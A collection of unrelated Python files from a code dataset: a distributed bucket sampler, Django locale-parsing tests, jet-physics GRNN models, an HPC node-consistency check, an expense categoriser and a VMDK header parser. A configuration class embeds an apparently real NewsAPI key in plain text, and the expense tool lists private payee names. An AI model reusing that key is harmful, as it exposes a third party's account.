Ex) boundaries = [b1, b2, b3] -> any batch is included either {x | b1 < length(x) <=b2} or {x | b2 < length(x) <= b3}.
It removes samples which are not included in the boundaries.
Ex) boundaries = [b1, b2, b3] -> any x s.t. length(x) <= b1 or length(x) > b3 are discarded.
"""
def __init__(self, dataset, batch_size, boundaries, num_replicas=None, rank=None, shuffle=True):
super().__init__(dataset, num_replicas=num_replicas, rank=rank, shuffle=shuffle)
self.lengths = dataset.lengths
self.batch_size = batch_size
self.boundaries = boundaries
self.buckets, self.num_samples_per_bucket = self._create_buckets()
self.total_size = sum(self.num_samples_per_bucket)
self.num_samples = self.total_size // self.num_replicas
def _create_buckets(self):
buckets = [[] for _ in range(len(self.boundaries) - 1)]
for i in range(len(self.lengths)):
length = self.lengths[i]
idx_bucket = self._bisect(length)
if idx_bucket != -1:
buckets[idx_bucket].append(i)
for i in range(len(buckets) - 1, 0, -1):
if len(buckets[i]) == 0:
buckets.pop(i)
self.boundaries.pop(i+1)
num_samples_per_bucket = []
for i in range(len(buckets)):
len_bucket = len(buckets[i])
total_batch_size = self.num_replicas * self.batch_size
rem = (total_batch_size - (len_bucket % total_batch_size)) % total_batch_size
num_samples_per_bucket.append(len_bucket + rem)
return buckets, num_samples_per_bucket
def __iter__(self):
# deterministically shuffle based on epoch
g = torch.Generator()
g.manual_seed(self.epoch)
indices = []
if self.shuffle:
for bucket in self.buckets:
indices.append(torch.randperm(len(bucket), generator=g).tolist())
else:
for bucket in self.buckets:
indices.append(list(range(len(bucket))))
batches = []
for i in range(len(self.buckets)):
bucket = self.buckets[i]
len_bucket = len(bucket)
ids_bucket = indices[i]
num_samples_bucket = self.num_samples_per_bucket[i]
# add extra samples to make it evenly divisible
rem = num_samples_bucket - len_bucket
ids_bucket = ids_bucket + ids_bucket * (rem // len_bucket) + ids_bucket[:(rem % len_bucket)]
# subsample
ids_bucket = ids_bucket[self.rank::self.num_replicas]
# batching
for j in range(len(ids_bucket) // self.batch_size):
batch = [bucket[idx] for idx in ids_bucket[j*self.batch_size:(j+1)*self.batch_size]]
batches.append(batch)
if self.shuffle:
batch_ids = torch.randperm(len(batches), generator=g).tolist()
batches = [batches[i] for i in batch_ids]
self.batches = batches
assert len(self.batches) * self.batch_size == self.num_samples
return iter(self.batches)
def _bisect(self, x, lo=0, hi=None):
if hi is None:
hi = len(self.boundaries) - 1
if hi > lo:
mid = (hi + lo) // 2
if self.boundaries[mid] < x and x <= self.boundaries[mid+1]:
return mid
elif x <= self.boundaries[mid]:
return self._bisect(x, lo, mid)
else:
return self._bisect(x, mid + 1, hi)
else:
return -1
def __len__(self):
return self.num_samples // self.batch_size
| StarcoderdataPython |
3202727 |
class Games():
"""
A general representation of an
abstract game
"""
fun_level = 5
def __init__(self, player1='Alice', player2='Bob'):
self.rounds = 2
self.current_round = 0
self.player1 = player1
self.player2 = player2
self.player1_score = 0
self.player2_score = 0
def print_player(self):
"""Print the players of the game"""
print(self.player1, "is playing", self.player2)
def add_round(self):
self.current_round += 1
def player1_score_add(self):
self.player1_score += 1
def player2_score_add(self):
self.player2_score += 1
def report_score(self):
print(self.player1, "has", self.player1_score, "points and ",
self.player2, "has ", self.player2_score, "points")
class TicTacToe(Games):
"""
This is a child class from the games class
"""
def __init__(self, player1='Will', player2='Mac'):
super().__init__(player1, player2)
self.x = self.player1
self.o = self.player2
def x_and_o(self):
print(self.x, "is team X and", self.o, "is team O")
if __name__ == "__main__":
pass
"""
I'm instantiating an insteance of Games()
"""
game = Games()
print(game.rounds)
ttt = TicTacToe()
print(ttt.x_and_o) | StarcoderdataPython |
3368502 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
-------------------------------------------------------------------------------
@Name: adder3.py
@Desc:
@Author: <EMAIL>
@Create: 2020.05.13 9:38
-------------------------------------------------------------------------------
@Change: 2020.05.13
-------------------------------------------------------------------------------
"""
import sys
sum = 0
for line in sys.stdin:
sum += int(line)
print(sum)
| StarcoderdataPython |
1659061 | <gh_stars>0
#!/usr/bin/env python3
import json
import subprocess
import sys
def main():
# Get UAN Nodes from HSM
cmd = "cray hsm state components list --role Application --subrole UAN --format json".split()
raw_result = subprocess.run(cmd, stdout=subprocess.PIPE)
result = json.loads(raw_result.stdout.decode("utf-8"))
hsm_discovered_uans = {node["ID"] for node in result["Components"]}
# Get UAN nodes that SLS knows about
cmd = "cray sls hardware list --format json".split()
raw_result = subprocess.run(cmd, stdout=subprocess.PIPE)
result = json.loads(raw_result.stdout.decode("utf-8"))
sls_known_uans = {node["Xname"] for node in result
if "ExtraProperties" in node
if "SubRole" in node["ExtraProperties"]
if node["ExtraProperties"]["SubRole"] == "UAN"}
if hsm_discovered_uans != sls_known_uans:
in_hsm_not_sls = hsm_discovered_uans - sls_known_uans
in_sls_not_hsm = sls_known_uans - hsm_discovered_uans
if in_hsm_not_sls:
print("ERROR: The Hardware State Manager (HSM) contains UAN nodes that System Layout Service (SLS) does not.")
print("Nodes: ", in_hsm_not_sls)
if in_sls_not_hsm:
print("ERROR: System Layout Service (SLS) contains UAN nodes the Hardware State Manager (HSM) does not.")
print("Nodes: ", in_sls_not_hsm)
sys.exit(1)
else:
print("PASS: System Layout Service (SLS) and Hardware State Manager (HSM) contain the same UAN nodes.")
print("Nodes: ", sls_known_uans)
sys.exit(0)
if __name__ == "__main__":
main()
| StarcoderdataPython |
1736449 | import sys
tests = """
>>> from django.utils.translation.trans_real import parse_accept_lang_header
>>> p = parse_accept_lang_header
#
# Testing HTTP header parsing. First, we test that we can parse the values
# according to the spec (and that we extract all the pieces in the right order).
#
Good headers.
>>> p('de')
[('de', 1.0)]
>>> p('en-AU')
[('en-AU', 1.0)]
>>> p('*;q=1.00')
[('*', 1.0)]
>>> p('en-AU;q=0.123')
[('en-AU', 0.123)]
>>> p('en-au;q=0.5')
[('en-au', 0.5)]
>>> p('en-au;q=1.0')
[('en-au', 1.0)]
>>> p('da, en-gb;q=0.25, en;q=0.5')
[('da', 1.0), ('en', 0.5), ('en-gb', 0.25)]
>>> p('en-au-xx')
[('en-au-xx', 1.0)]
>>> p('de,en-au;q=0.75,en-us;q=0.5,en;q=0.25,es;q=0.125,fa;q=0.125')
[('de', 1.0), ('en-au', 0.75), ('en-us', 0.5), ('en', 0.25), ('es', 0.125), ('fa', 0.125)]
>>> p('*')
[('*', 1.0)]
>>> p('de;q=0.')
[('de', 1.0)]
>>> p('')
[]
Bad headers; should always return [].
>>> p('en-gb;q=1.0000')
[]
>>> p('en;q=0.1234')
[]
>>> p('en;q=.2')
[]
>>> p('abcdefghi-au')
[]
>>> p('**')
[]
>>> p('en,,gb')
[]
>>> p('en-au;q=0.1.0')
[]
>>> p('XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXZ,en')
[]
>>> p('da, en-gb;q=0.8, en;q=0.7,#')
[]
>>> p('de;q=2.0')
[]
>>> p('de;q=0.a')
[]
>>> p('')
[]
#
# Now test that we parse a literal HTTP header correctly.
#
>>> from django.utils.translation.trans_real import get_language_from_request
>>> g = get_language_from_request
>>> from django.http import HttpRequest
>>> r = HttpRequest
>>> r.COOKIES = {}
These tests assumes the es, es_AR, pt and pt_BR translations exit in the Django
source tree.
>>> r.META = {'HTTP_ACCEPT_LANGUAGE': 'pt-br'}
>>> g(r)
'pt-br'
>>> r.META = {'HTTP_ACCEPT_LANGUAGE': 'pt'}
>>> g(r)
'pt'
>>> r.META = {'HTTP_ACCEPT_LANGUAGE': 'es,de'}
>>> g(r)
'es'
>>> r.META = {'HTTP_ACCEPT_LANGUAGE': 'es-ar,de'}
>>> g(r)
'es-ar'
# Now test that we parse language preferences stored in a cookie correctly.
>>> from django.conf import settings
>>> r.COOKIES = {settings.LANGUAGE_COOKIE_NAME: 'pt-br'}
>>> r.META = {}
>>> g(r)
'pt-br'
>>> r.COOKIES = {settings.LANGUAGE_COOKIE_NAME: 'pt'}
>>> r.META = {}
>>> g(r)
'pt'
>>> r.COOKIES = {settings.LANGUAGE_COOKIE_NAME: 'es'}
>>> r.META = {'HTTP_ACCEPT_LANGUAGE': 'de'}
>>> g(r)
'es'
"""
# Python 2.3 and 2.4 return slightly different results for completely bogus
# locales, so we omit this test for that anything below 2.4. It's relatively
# harmless in any cases (GIGO). This also means this won't be executed on
# Jython currently, but life's like that sometimes. (On those platforms,
# passing in a truly bogus locale will get you the default locale back.)
if sys.version_info >= (2, 5):
tests += """
This test assumes there won't be a Django translation to a US variation
of the Spanish language, a safe assumption. When the user sets it
as the preferred language, the main 'es' translation should be selected
instead.
>>> r.COOKIES = {}
>>> r.META = {'HTTP_ACCEPT_LANGUAGE': 'es-us'}
>>> g(r)
'es'
>>> r.COOKIES = {settings.LANGUAGE_COOKIE_NAME: 'es-us'}
>>> r.META = {}
>>> g(r)
'es'
"""
tests += """
This tests the following scenario: there isn't a main language (zh)
translation of Django but there is a translation to variation (zh_CN)
the user sets zh-cn as the preferred language, it should be selected by
Django without falling back nor ignoring it.
>>> r.COOKIES = {}
>>> r.META = {'HTTP_ACCEPT_LANGUAGE': 'zh-cn,de'}
>>> g(r)
'zh-cn'
>>> r.COOKIES = {settings.LANGUAGE_COOKIE_NAME: 'zh-cn'}
>>> r.META = {'HTTP_ACCEPT_LANGUAGE': 'de'}
>>> g(r)
'zh-cn'
"""
| StarcoderdataPython |
1789136 |
word = input("enter a word: ")
"""number = len(word) - 1
while(number >= 0): # base condition
print(word[number], end = "")
number -=1
"""
def reverse(word, num):
print(word[num], end = "")
if len(word) == 1:
return
else:
word = word[:-1]
return reverse(word, len(word) - 1)
reverse(word, len(word) - 1)
| StarcoderdataPython |
163666 | <reponame>isaachenrion/jets<gh_stars>1-10
import torch
import torch.nn as nn
import torch.nn.functional as F
from ..utils import AnyBatchGRUCell
from ..utils import BiDirectionalTreeGRU
class GRNNTransformSimple(nn.Module):
def __init__(self, features=None, hidden=None,**kwargs):
super().__init__()
activation_string = 'relu'
self.activation = getattr(F, activation_string)
self.fc_u = nn.Linear(features, hidden)
self.fc_h = nn.Linear(3 * hidden, hidden)
gain = nn.init.calculate_gain(activation_string)
nn.init.xavier_uniform(self.fc_u.weight, gain=gain)
nn.init.orthogonal(self.fc_h.weight, gain=gain)
def forward(self, jets, **kwargs):
#n_jets = len(jets)
#levels, children, n_inners, contents = batch(jets)
levels, children, n_inners, contents, n_jets = jets
#n_jets = len(contents)
n_levels = len(levels)
embeddings = []
for i, nodes in enumerate(levels[::-1]):
j = n_levels - 1 - i
try:
inner = nodes[:n_inners[j]]
except ValueError:
inner = []
try:
outer = nodes[n_inners[j]:]
except ValueError:
outer = []
u_k = self.fc_u(contents[j])
u_k = self.activation(u_k)
if len(inner) > 0:
zero = torch.zeros(1).long(); one = torch.ones(1).long()
if torch.cuda.is_available(): zero = zero.cuda(); one = one.cuda()
h_L = embeddings[-1][children[inner, zero]]
h_R = embeddings[-1][children[inner, one]]
h = torch.cat((h_L, h_R, u_k[:n_inners[j]]), 1)
h = self.fc_h(h)
h = self.activation(h)
try:
embeddings.append(torch.cat((h, u_k[n_inners[j]:]), 0))
except ValueError:
embeddings.append(h)
else:
embeddings.append(u_k)
return embeddings[-1].view((n_jets, -1))
class GRNNTransformGated(nn.Module):
def __init__(self, features=None, hidden=None, iters=0, **kwargs):
super().__init__()
self.hidden = hidden
self.iters = iters
activation_string = 'relu' if iters == 0 else 'tanh'
self.activation = getattr(F, activation_string)
self.fc_u = nn.Linear(features, hidden)
self.fc_h = nn.Linear(3 * hidden, hidden)
self.fc_z = nn.Linear(4 * hidden, 4 * hidden)
self.fc_r = nn.Linear(3 * hidden, 3 * hidden)
gain = nn.init.calculate_gain(activation_string)
nn.init.xavier_uniform(self.fc_u.weight, gain=gain)
nn.init.orthogonal(self.fc_h.weight, gain=gain)
nn.init.xavier_uniform(self.fc_z.weight, gain=gain)
nn.init.xavier_uniform(self.fc_r.weight, gain=gain)
if self.iters > 0:
self.down_root = nn.Linear(hidden, hidden)
self.down_gru = AnyBatchGRUCell(hidden, hidden)
def forward(self, jets, return_states=False, **kwargs):
#n_jets = len(conte)
levels, children, n_inners, contents, n_jets = jets
#n_jets = len(contents)
#parents= batch_parents(jets)
up_embeddings = [None for _ in range(len(levels))]
down_embeddings = [None for _ in range(len(levels))]
self.recursive_embedding(up_embeddings, levels, children, n_inners, contents)
if True:# or self.iters == 0:
return up_embeddings[0].view((n_jets, -1))
else:
return torch.cat(
(
up_embeddings[0].view((n_jets, -1)),
down_embeddings[0].view((n_jets, -1))
),
1)
def recursive_embedding(self, up_embeddings, levels, children, n_inners, contents):
n_levels = len(levels)
hidden = self.hidden
for i, nodes in enumerate(levels[::-1]):
j = n_levels - 1 - i
try:
inner = nodes[:n_inners[j]]
except ValueError:
inner = []
try:
outer = nodes[n_inners[j]:]
except ValueError:
outer = []
u_k = self.fc_u(contents[j])
u_k = self.activation(u_k)
if len(inner) > 0:
try:
u_k_inners = u_k[:n_inners[j]]
except ValueError:
u_k_inners = []
try:
u_k_leaves = u_k[n_inners[j]:]
except ValueError:
u_k_leaves = []
zero = torch.zeros(1).long(); one = torch.ones(1).long()
if torch.cuda.is_available(): zero = zero.cuda(); one = one.cuda()
h_L = up_embeddings[j+1][children[inner, zero]]
h_R = up_embeddings[j+1][children[inner, one]]
hhu = torch.cat((h_L, h_R, u_k_inners), 1)
r = self.fc_r(hhu)
r = F.sigmoid(r)
h_H = self.fc_h(r * hhu)
h_H = self.activation(h_H)
z = self.fc_z(torch.cat((h_H, hhu), -1))
z_H = z[:, :hidden] # new activation
z_L = z[:, hidden:2*hidden] # left activation
z_R = z[:, 2*hidden:3*hidden] # right activation
z_N = z[:, 3*hidden:] # local state
z = torch.stack([z_H,z_L,z_R,z_N], 2)
z = F.softmax(z)
h = ((z[:, :, 0] * h_H) +
(z[:, :, 1] * h_L) +
(z[:, :, 2] * h_R) +
(z[:, :, 3] * u_k_inners))
try:
up_embeddings[j] = torch.cat((h, u_k_leaves), 0)
except AttributeError:
up_embeddings[j] = h
else:
up_embeddings[j] = u_k
| StarcoderdataPython |
60451 | <filename>quokka/utils/custom_vars.py
# coding: utf-8
from dynaconf.utils.parse_conf import parse_conf_data
def parse_data(data):
"""Return converted data from @int, @float, @bool, @json markers"""
return parse_conf_data(data)
def custom_var_dict(cvarlist):
cvarlist = cvarlist or []
return {
cvar['key']: parse_data(cvar['value'])
for cvar in cvarlist
}
| StarcoderdataPython |
166025 | <reponame>vreon/figment<gh_stars>10-100
from figment import Component
class Important(Component):
"""An item that can't be dropped or taken."""
| StarcoderdataPython |
1715385 | class Config:
'''
General configuration parent class
'''
NEWS_SOURCES_BASE_URL = 'https://newsapi.org/v2/sources?category={}&apiKey={}'
NEWS_NEWS_API_BASE_URL = 'https://newsapi.org/v2/everything?language=en&sources={}&apiKey={}'
pass
class ProdConfig(Config):
'''
Production configuration child class
Args:
Config: The parent configuration class with General configuration settings
'''
NEWS_API_KEY ='f64a31e5dca5460ab7e3f34713eb9670'
pass
class DevConfig(Config):
'''https://newsapi.org/v2/everything?q=bitcoin&from=2019-01-18&sortBy=publishedAt&apiKey=f64a31e5dca5460ab7e3f34713eb9670
Development configuration child class
Args:
Config: The parent configuration class with General configuration settings
'''
DEBUG = True | StarcoderdataPython |
3385935 | # -*- coding:utf-8 -*-
# --------------------------------------------------------
# Copyright (C), 2016-2021, lizhe, All rights reserved
# --------------------------------------------------------
# @Name: my_money.py
# @Author: lizhe
# @Created: 2021/9/14 - 22:12
# --------------------------------------------------------
import xlwings as xw
from abc import ABCMeta, abstractmethod
from typing import List, Dict
from automotive import Utils
outcome = "支出"
income = "收入"
categories = {
'购物消费': {
'衣裤鞋帽': ["领跑体育用品", "亚麻拖鞋", "优衣库"],
'洗护用品': [],
'厨房用品': ["佳帮手"],
'家用纺织': [],
'清洁用品': [],
'家居日用': ["宜家家居", "厨房下水道", "佛山照明t5", "防滑垫", "外科口罩", "冰箱贴磁贴", "冰箱磁性贴", "香榭手机维修"],
'家具家电': [],
'汽车用品': [],
'电子数码': ["小米之家", "罗马仕", "保护套", "腕带", "佳申驰通讯", "乾元宝融", "小米店", "小米科技"],
'美妆护肤': [],
'书报杂志': [],
'眼镜': []},
'食品酒水': {
'早餐': ["禾央汤包", "全家购物", "安德鲁森", "泸州小笼包", "麦的多", "麦包点", "周小霞", "红旗连锁订单-262267876806093", "勇",
"红旗连锁订单-262267874206093", "四川善禅农业科技有限公司"],
'中餐': ["阿蠔海鲜焖面", "卢婆婆姜鸭面", "顺旺基", "荟福源", "宜宾燃面", "享米时", "老麻抄手", "西北面点王",
"袁记云饺", "籣州牛肉面", "成都鸡汤抄手", "大巴山猪脚饭", "卤鹅饭", "e特黄焖鸡瓦香鸡成都店",
"杨铭宇黄焖鸡米饭", "八二小区干海椒抄手", "晓武林烤鸭", "乡村基", "戊丰记卤肉饭", "沙县小吃成都银泰城店",
"喜水饺", "兵哥豌豆面", "福记羊肉米粉", "岭南牛杂", "自小田", "搪瓷盌小面成都伏龙北巷", "蚝门圣焱", "本味简餐厅",
"粤饺皇", "南城香冒烤鸭卤肉饭", "贰柒拾乐山干绍面", "拾小馆", "陕西面馆", "干辣椒抄手", "豆汤饭", "快餐店",
"姜鸭面", "北方水饺", "匡胖子面馆", "余肥肠", "蜀人卤匠乌鸡米线", "张氏海味面", "担担面", "蒌兰兰州牛肉面"],
'晚餐': ["庆元猪脚饭"],
'零食': ["面包新语(银泰城店)", "雪糕批发", "一同零食", "商户_李黎明", "红旗连锁订单-261927364406093"],
'水果': ["水果", "芭芭农场"],
'超市购物': ["成都市北城天街店", "成都荆竹中路店", "麦德龙", "欧尚成都市高新店", "谊品生鲜", "高新店", "成都盒马",
"成都中营贸易", "招商雍华府店", "万家V+南区", "银犁冷藏", "金牛店", "恒旺超市", "支付宝签购单,永辉(成都市银泰城店)"],
'烟酒茶': [],
'外出美食': ["金翠河烧鹅餐厅", "马帮冒菜", "实惠啤酒鸭", "麦当劳", "食其家", "正反面", "青羊区东方宫牛肉拉面店", "成都港九餐饮",
"八二私房水饺", "鱼吖吖(武侯店)", "口味鲜面庄", "叶抄手", "雷四孃小吃", "朱记蛙三", "火舞凉山西昌原生烧烤",
"万州烤鱼", "肯德基", "巴山豆花饭成都", "卡萨马可", "老北京炸酱面", "禾木烤肉", "峨眉山周记烧烤", "青年火锅店",
"茵赫餐饮管理", "汉堡王", "热恋冰淇淋", "初壹饺子", "点都德", "跷脚牛肉", "外卖订单", "蔡锅盔", "潮汕牛肉", "印度菜菜",
"韩吉烤肉", "小川王饭店", "传统杂酱面", "烤肉", "蓉辉川菜", "菜鸟烧菜", "老马家资格烤羊排", "正禾鲜", "港仔老友记", "漫山洋芋",
"好功夫煲仔饭", "林妹妹饺子馆", "辣妈串串香", "醉鹃城市井火锅", "口口香饭店"],
'粮油米面': [],
'米': [],
'面': ["谢孝元", "高筋鲜面"],
'肉类': ["金忠食品", "邓哥鱼铺", "龙仕林", "成都泥厨子大食堂", "章相山", "ZXS", "黑龙滩生态鱼铺", "谢氏冷鲜店", "良波", "龙哥鲜肉铺", "顾老四乡村土鸡", "高金食品"],
'香料': ["林叔干杂铺"],
'饮料': ["书亦烧仙草", "星巴克", "书亦燒仙草", "Mii Coffee", "茶百道", "瑞幸咖啡", "GREYBOX COFFEE", "可口可乐", "红旗连锁订单-262538119309061",
"红旗连锁订单-262903487208224",
"日记咖啡馆", "丸摩堂", "怡宝纯净水", "长虹科技大厦二店", "君茂副食", "天然水", "不要对我尖叫", "0708玉泉街分店", "航空路中心店", "奈雪の茶",
"红旗连锁订单-261927353606093", "红旗连锁订单-262478899806093", "红旗连锁订单-262459446909458"],
'调料': ["花生碎"],
'蔬菜': ["登梅", "雪梅", "思忠", "*琴", "兰兰姐", "*再泉", "春儿", "蔡德文", "沈德全", "小兰蔬菜店",
"玲利", "邓花椒", "郑淑秀", "正宏", "蔬菜", "沈哥菜摊", "*青", "绿叶", "廖礼华"],
'蛋类': [],
'奶制品': [],
'宵夜': [],
'食用油': [],
'外购凉菜': ["唐家臻记", "紫燕百味鸡", "敖锦记烫油鹅", "掌柜土鸡片", "乐山甜皮鸭"],
'调味品': [],
'速冻食品': [],
'买菜': [],
'饮料牛奶': []
},
'居家生活': {
'清洁衣物': [],
'水费': [],
'电费': ["电费"],
'燃气费': ["燃气费"],
'物管费': ["重庆华宇", "物业管理费"],
'维修费': [],
'房屋清洁': [],
'理发': ["丽发堂"]
},
'行车交通': {
'加油': ["壳牌", "中石化", "中油", "加好油", "中国石油"],
'停车': ["无感支付", "停车场", "瑞林", "中青旅山", "停车费"],
'保养': [],
'维修': [],
'违章罚款': [],
'保险': [],
'公交': [],
'地铁': ["成都地铁运营有限公司", "轨道交通", "成都地铁", "天府通", "公共交通"],
'打车': ["滴滴快车", "高德地图打车"],
'租车': [],
'火车': ["火车票"],
'飞机': [],
'驾照': [],
'自行车': ["哈啰"],
'过路费': [],
'洗车': ["德系名车专修"],
'大巴': []
},
'交流通讯': {
'手机费': ["中国移动", "中国电信"],
'邮寄费': []
},
'休闲娱乐': {
'电影': [],
'宠物': ["鸡胸肉鲜", "猫", "伍德氏", "激光笔", "瑞爱康宠物医院", "猫砂", "宠物", "红旗连锁订单-261948554408349"],
'其他娱乐': [],
'花鸟虫鱼': []
},
'人情费用': {
'请客': [],
'孝敬父母': ["崔丽"],
'红包': ["支付宝红包"],
'其他人情': []
},
'公司出差': {
'交通费': [],
'住宿费': [],
'餐饮费': [],
'其他消费': []
},
'金融保险': {
'汽车首付': [],
'投资亏损': [],
'车贷': [],
'按揭还款': [],
'车贷手续': [],
'房贷': [],
'人身保险': ["众安在线", "相互宝", "保险"],
'医疗保险': []
},
'医疗教育': {
'门诊药品': [],
'住院费': [],
'体检': []
},
'装修费用': {
'装修材料': [],
'家电家具': [],
'装修装饰': [],
'装修人工': [],
'装修其他': []
},
'其他杂项': {
'意外丢失': [],
'烂账损失': [],
'其他支出': ["爱心捐赠"]
},
'旅游消费': {
'住宿': ["102702238409", "马耀龙"],
'证件': [],
'餐饮': ["伊香阁餐厅", "郑立峰", "依然風流", "曾凡政", "新俊商店", "*金梅", "马奴海", "*君平", "赫伊尔牛肉面", "顺姐", "照林", "朱之胜",
"泉记濑粉皇", "惠福东路分店", "陶陶居", "莲香楼", "潘瑞枝", "蔡澜抱抱", "广州盒马", "瓒记美食", "饵果生活超市", "陈在喜", "罗意安", "军校精品"],
'交通': ["广州地铁", "广州羊城通", "华住酒店订单5102201210517231523139006X05R9DH", "去哪儿网"],
'购物': ["格尔木梦幻盐湖", "大柴旦晶晶综合超市", "武威服务区", "西广场店", "建军"],
'旅游其他': []
}
}
def contain_keyword(keywords: list, pay_detail: str) -> bool:
for keyword in keywords:
if keyword in pay_detail:
return True
return False
class TemplateExcel(object):
def __init__(self):
# 交易类型
self.exchange_type = ""
# 日期
self.date = ""
# 分类
self.category = ""
# 子分类
self.sub_category = ""
# 账户1
self.account1 = ""
# 账户2
self.account2 = ""
# 金额
self.amount = ""
# 成员
self.member = ""
# 商家
self.seller = ""
# 项目
self.project = ""
# 备注
self.comment = ""
def __str__(self):
result = ""
for key, value in self.__dict__.items():
result = f"{result} {key} = [{value}]"
return result
class AbsOps(metaclass=ABCMeta):
def __init__(self):
self._utils = Utils()
@abstractmethod
def read(self, file: str) -> Dict[str, List[TemplateExcel]]:
pass
def write(self, date_dict: Dict[str, List[TemplateExcel]], file: str = "template.xls"):
app = xw.App(visible=True, add_book=False)
wb = app.books.open(file)
out_list = date_dict[outcome]
try:
in_list = date_dict[income]
except KeyError:
in_list = []
in_sheet = wb.sheets[income]
out_sheet = wb.sheets[outcome]
in_sheet.range("A2").value = self.__convert_contents(in_list)
out_sheet.range("A2").value = self.__convert_contents(out_list)
wb.save(f"result_{self._utils.get_time_as_string()}.xls")
wb.close()
app.quit()
@staticmethod
def __convert_contents(templates: List[TemplateExcel]) -> List:
contents = []
if len(templates) > 0:
for template in templates:
contents.append((
template.exchange_type,
template.date,
template.category,
template.sub_category,
template.account1,
template.account2,
template.amount,
template.member,
template.seller,
template.project,
template.comment
))
return contents
def read_file(file: str, encoding: str = "utf-8") -> list:
with open(file, "r", encoding=encoding) as f:
return f.readlines()
| StarcoderdataPython |
1783890 | <filename>lib/oci_utils/migrate/image_types/vmdk.py
# oci-utils
#
# Copyright (c) 2019, 2021 Oracle and/or its affiliates. All rights reserved.
# Licensed under the Universal Permissive License v 1.0 as shown
# at http://oss.oracle.com/licenses/upl.
"""
Module to handle VMDK formatted virtual disk images.
"""
import logging
import os
import re
import struct
from oci_utils.migrate import migrate_data
from oci_utils.migrate import read_yn
from oci_utils.migrate import result_msg
from oci_utils.migrate.exception import OciMigrateException
from oci_utils.migrate.imgdevice import DeviceData
from oci_utils.migrate.migrate_data import gigabyte
"""
typedef uint64 SectorType;
typedef uint8 Bool;
typedef struct SparseExtentHeader {
uint32 magicNumber;
uint32 version;
uint32 flags;
SectorType capacity;
SectorType grainSize;
SectorType descriptorOffset;
SectorType descriptorSize;
uint32 numGTEsPerGT;
SectorType rgdOffset;
SectorType gdOffset;
SectorType overHead;
Bool uncleanShutdown;
char singleEndLineChar;
char nonEndLineChar;
char doubleEndLineChar1;
char doubleEndLineChar2;
uint16 compressAlgorithm;
uint8 pad[433];
} SparseExtentHeader
"""
format_data = {'4b444d56': {'name': 'vmdk',
'module': 'vmdk',
'clazz': 'VmdkHead',
'prereq': {'MAX_IMG_SIZE_GB': 400.0,
'vmdk_supported_types': ['monolithicSparse', 'streamOptimized']}}}
_logger = logging.getLogger('oci-utils.vmdk')
class VmdkHead(DeviceData):
"""
Class to analyse header of vmdk image file.
Attributes
----------
filename: str
The full path of the vmdk image file.
stat: tuple
The image file stat data.
img_tag: str
The bare file name.
vmdkhead_dict: dict
The VMDK file header as a dictionary.
vmdkdesc_dict: dict
The VMDK file description as a dictionary.
"""
#
Bool = '?'
char = 'B' # 1 byte char
uint8 = 'B' # 1 byte unsigned int
uint16 = 'H' # 16bit unsigned int
uint32 = 'I' # 32bit unsigned int
uint64 = 'Q' # 64bit unsigned long
SectorType = 'Q' # 64bit unsigned long
string = 's' # string
#
# vmdk header0 definition:
header0_structure = [[uint32, '%#x', 'magic'],
[uint32, '%d', 'version'],
[uint32, '%#x', 'flags'],
[SectorType, '%d', 'capacity'],
[SectorType, '%d', 'grainSize'],
[SectorType, '%d', 'descriptorOffset'],
[SectorType, '%d', 'descriptorSize'],
[uint32, '%d', 'numGTEsPerGT'],
[SectorType, '%d', 'rgdOffset'],
[SectorType, '%d', 'gdOffset'],
[SectorType, '%d', 'overHead'],
[Bool, '%#x', 'uncleanShutdown'],
[char, '%#x', 'singleEndLineChar'],
[char, '%#x', 'nonEndLineChar'],
[char, '%#x', 'doubleEndLineChar1'],
[char, '%#x', 'doubleEndLineChar2'],
[uint16, '%s', 'compressAlgorithm'],
[uint8, '%#x', 'pad'] * 433]
#
# struct format string
vmdkhead_fmt = '<' + ''.join(f[0] for f in header0_structure)
head_size = struct.calcsize(vmdkhead_fmt)
_logger = logging.getLogger('oci-utils.vmdk')
streamoptimized_msg = '\n Although streamOptimized is a supported format, ' \
'issues might arise during or after mounting the ' \
'image file. It is advised\n to convert the image ' \
'file to monolithicSparse by running ' \
'[qemu-img convert -O vmdk thisimage.vmdk newimage.vmdk]\n'
def __init__(self, filename):
"""
Initialisation of the vmdk header analysis.
Parameters
----------
filename: str
Full path of the vmdk image file.
"""
super().__init__(filename)
_logger.debug('VMDK header size: %d bytes', self.head_size)
try:
with open(self._fn, 'rb') as f:
head_bin = f.read(self.head_size)
_logger.debug('%s header successfully read', self._fn)
except Exception as e:
_logger.critical(' Failed to read header of %s: %s', self._fn, str(e))
raise OciMigrateException('Failed to read the header of %s: %s' % self._fn) from e
vmdkheader = struct.unpack(VmdkHead.vmdkhead_fmt, head_bin)
try:
with open(self._fn, 'rb') as f:
f.seek(512)
head_descr = [it for
it in f.read(1024).decode('utf-8').splitlines()
if '=' in it]
except Exception as e:
_logger.critical(' Failed to read description of %s: %s', self._fn, str(e))
raise OciMigrateException('Failed to read the description of %s: %s' % self._fn) from e
self.stat = os.stat(self._fn)
self.img_tag = os.path.splitext(os.path.split(self._fn)[1])[0]
self.vmdkhead_dict = dict((name[2], vmdkheader[i]) for i, name in
enumerate(VmdkHead.header0_structure))
self.vmdkdesc_dict = dict(
[re.sub(r'"', '', kv).split('=') for kv in head_descr])
self.img_header = dict()
self.img_header['head'] = self.vmdkhead_dict
self.img_header['desc'] = self.vmdkdesc_dict
result_msg(msg='Got image %s header' % filename, result=False)
def show_header(self):
"""
Lists the header contents formatted.
Returns
-------
No return value.
"""
result_msg(msg='\n %30s\n %30s %30s' % ('VMDK file header data', '-' * 30, '-' * 30), result=False)
for f in VmdkHead.header0_structure:
result_msg(msg=''.join([' %30s : ' % f[2], f[1] % self.vmdkhead_dict[f[2]]]), result=False)
result_msg(msg='\n %30s\n %30s %30s' % ('VMDK file descriptor data', '-' * 30, '-' * 30), result=False)
for k in sorted(self.vmdkdesc_dict):
result_msg(msg=' %30s : %-30s' % (k, self.vmdkdesc_dict[k]), result=False)
def image_size(self):
"""
Get the size of the image file.
Returns
-------
dict:
physical file size, logical file size
"""
img_sz = {'physical': float(self.stat.st_size)/gigabyte,
'logical': float(self.vmdkhead_dict['capacity']*512)/gigabyte}
result_msg(
msg='Image size: physical %10.2f GB, logical %10.2f GB'
% (img_sz['physical'], img_sz['logical']),
result=True)
return img_sz
def image_supported(self, image_defs):
"""
Verifies if the image file is supported for migration to the Oracle
cloud infrastructure.
Parameters
----------
image_defs: dict
